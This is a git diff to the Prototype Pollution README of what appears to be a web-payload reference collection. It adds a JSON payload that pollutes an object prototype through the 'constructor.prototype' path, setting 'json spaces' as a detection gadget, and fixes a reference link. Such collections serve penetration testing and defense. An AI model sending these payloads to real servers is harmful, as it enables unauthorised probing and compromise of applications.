diff --git a/Prototype Pollution/README.md b/Prototype Pollution/README.md index 5770e1b806..4431bce5a1 100644 --- a/Prototype Pollution/README.md +++ b/Prototype Pollution/README.md @@ -99,6 +99,19 @@ Asynchronous payload for NodeJS. } ``` +Polluting the prototype via the `constructor` property instead. + +```js +{ + "constructor": { + "prototype": { + "foo": "bar", + "json spaces": 10 + } + } +} +``` + ### Prototype Pollution in URL @@ -176,4 +189,4 @@ Either create your own gadget using part of the source with [yeswehack/pp-finder * [Prototype Pollution Leads to RCE: Gadgets Everywhere - Mikhail Shcherbakov](https://youtu.be/v5dq80S1WF4) * [Server side prototype pollution, how to detect and exploit - YesWeHack](https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/) * [Server-side prototype pollution: Black-box detection without the DoS - Gareth Heyes - 15 February 2023](https://portswigger.net/research/server-side-prototype-pollution) -* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes](https://youtu.be/LD-KcuKM_0M) \ No newline at end of file +* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes](https://youtu.be/LD-KcuKM_0M)